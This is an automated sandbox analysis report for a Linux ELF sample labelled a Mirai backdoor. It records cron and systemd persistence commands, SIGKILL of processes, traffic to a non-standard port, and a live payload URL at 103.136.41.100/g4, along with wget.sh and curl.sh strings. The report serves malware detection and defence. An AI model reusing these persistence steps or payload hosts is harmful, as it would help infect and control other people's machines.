Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g4.elf

Overview

General Information

Sample name:g4.elf
Analysis ID:1589621
MD5:1443976ddacfe32b22fe05a76420689c
SHA1:6493f3149343976174ad2c1b3389526ec2255276
SHA256:3a6669e953a2133f8de9dd431e2aadbe65fd64e8a6ee9508a9e62a303a7ecbc9
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589621
Start date and time:2025-01-13 00:11:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 15s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g4.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: /etc/init.d/hello
  • VT rate limit hit for: http://103.136.41.100/g4
Command:/tmp/g4.elf
PID:5444
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • g4.elf (PID: 5444, Parent: 5359, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g4.elf
    • g4.elf New Fork (PID: 5455, Parent: 5444)
    • sh (PID: 5455, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5457, Parent: 5455)
      • systemctl (PID: 5457, Parent: 5455, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g4.elf New Fork (PID: 5463, Parent: 5444)
    • sh (PID: 5463, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5469, Parent: 5463)
      • systemctl (PID: 5469, Parent: 5463, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • g4.elf New Fork (PID: 5470, Parent: 5444)
    • sh (PID: 5470, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 5472, Parent: 5470)
      • crontab (PID: 5472, Parent: 5470, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g4.elf New Fork (PID: 5473, Parent: 5444)
    • sh (PID: 5473, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 5475, Parent: 5473)
    • g4.elf New Fork (PID: 5477, Parent: 5444)
      • g4.elf New Fork (PID: 5479, Parent: 5477)
        • g4.elf New Fork (PID: 5484, Parent: 5479)
        • g4.elf New Fork (PID: 5486, Parent: 5479)
        • g4.elf New Fork (PID: 5488, Parent: 5479)
  • wrapper-2.0 (PID: 5448, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5449, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5450, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5451, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5452, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5453, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5459, Parent: 5458)
  • snapd-env-generator (PID: 5459, Parent: 5458, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g4.elfReversingLabs: Detection: 39%
Source: g4.elfVirustotal: Detection: 38%Perma Link
Source: global trafficTCP traffic: 192.168.2.13:52098 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.13:35841 -> 1.1.1.1:53
Source: /tmp/g4.elf (PID: 5444)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g4.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.dr, tmp.g8uE0X.38.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/g4
Source: g4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5448, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5449, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5450, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5451, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5452, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5453, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5448, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5449, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5450, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5451, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5452, result: successfulJump to behavior
Source: /tmp/g4.elf (PID: 5444)SIGKILL sent: pid: 5453, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5472)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 5472)File: /var/spool/cron/crontabs/tmp.g8uE0XJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5421/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5421/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5421/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5421/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5421/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5278/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5278/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5278/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5278/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/5278/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5444)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/g4.elf (PID: 5455)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g4.elf (PID: 5463)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/g4.elf (PID: 5470)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g4.elf (PID: 5473)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 5457)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5469)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/g4.elf (PID: 5444)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g4.elf (PID: 5444)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g4.elf (PID: 5444)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g4.elf (PID: 5444)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5448)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5449)Queries kernel information via 'uname': Jump to behavior
Source: g4.elf, 5444.1.00007ffecae9f000.00007ffecaec0000.rw-.sdmpBinary or memory string: /tmp/qemu-open.LCQ0VQ
Source: g4.elf, 5444.1.00007ffecae9f000.00007ffecaec0000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.LCQ0VQ:
Source: g4.elf, 5444.1.00007ffecae9f000.00007ffecaec0000.rw-.sdmp, g4.elf, 5477.1.00007ffecae9f000.00007ffecaec0000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/g4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g4.elf
Source: g4.elf, 5444.1.0000560be6e1a000.0000560be6f6b000.rw-.sdmp, g4.elf, 5477.1.0000560be6e1a000.0000560be6f6b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g4.elf, 5444.1.00007ffecae9f000.00007ffecaec0000.rw-.sdmp, g4.elf, 5477.1.00007ffecae9f000.00007ffecaec0000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g4.elf, 5444.1.0000560be6e1a000.0000560be6f6b000.rw-.sdmp, g4.elf, 5477.1.0000560be6e1a000.0000560be6f6b000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589621 Sample: g4.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 51 1.1.1.1, 35841, 53 CLOUDFLARENETUS Australia 2->51 53 77.90.22.16, 52098, 5625 ASGHOSTNETDE Germany 2->53 55 Multi AV Scanner detection for submitted file 2->55 9 g4.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 45 /tmp/crontab.tmp, troff 9->45 dropped 47 /etc/init.d/hello, Bourne-Again 9->47 dropped 57 Sample tries to kill multiple processes (SIGKILL) 9->57 59 Drops files in suspicious directories 9->59 19 g4.elf sh 9->19         started        21 g4.elf sh 9->21         started        23 g4.elf sh 9->23         started        25 2 other processes 9->25 signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 sh systemctl 23->33         started        35 g4.elf 25->35         started        37 sh 25->37         started        file9 49 /var/spool/cron/crontabs/tmp.g8uE0X, troff 27->49 dropped 61 Sample tries to persist itself using cron 27->61 63 Executes the "crontab" command typically for achieving persistence 27->63 39 g4.elf 35->39         started        41 g4.elf 35->41         started        43 g4.elf 35->43         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g4.elf39%ReversingLabsLinux.Backdoor.Mirai
g4.elf38%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g4100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%sg4.elffalse
    high
    http://103.136.41.100/g4hello.service.12.dr, hello.12.dr, tmp.g8uE0X.38.dr, crontab.tmp.12.drfalse
    • Avira URL Cloud: malware
    unknown
    http://1/wget.shg4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/g4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpfalse
        high
        http://9/curl.shg4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/g4.elf, 5444.1.00007fc264033000.00007fc264039000.rw-.sdmp, g4.elf, 5477.1.00007fc264033000.00007fc264039000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g6.elfGet hashmaliciousUnknownBrowse
              g3.elfGet hashmaliciousUnknownBrowse
                m1.elfGet hashmaliciousUnknownBrowse
                  m5.elfGet hashmaliciousUnknownBrowse
                    m2.elfGet hashmaliciousUnknownBrowse
                      1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                      • 1.1.1.1:8080/
                      6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/ctrl/playback.php
                      PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                      • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                      AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/
                      INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                      • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                      Go.exeGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUShttp://latamavuelospromosco.com/Get hashmaliciousUnknownBrowse
                      • 104.17.25.14
                      https://hmflowcontrols.com/ch/CHFINAL/50477/Get hashmaliciousUnknownBrowse
                      • 172.67.147.64
                      g6.elfGet hashmaliciousUnknownBrowse
                      • 1.1.1.1
                      g3.elfGet hashmaliciousUnknownBrowse
                      • 1.1.1.1
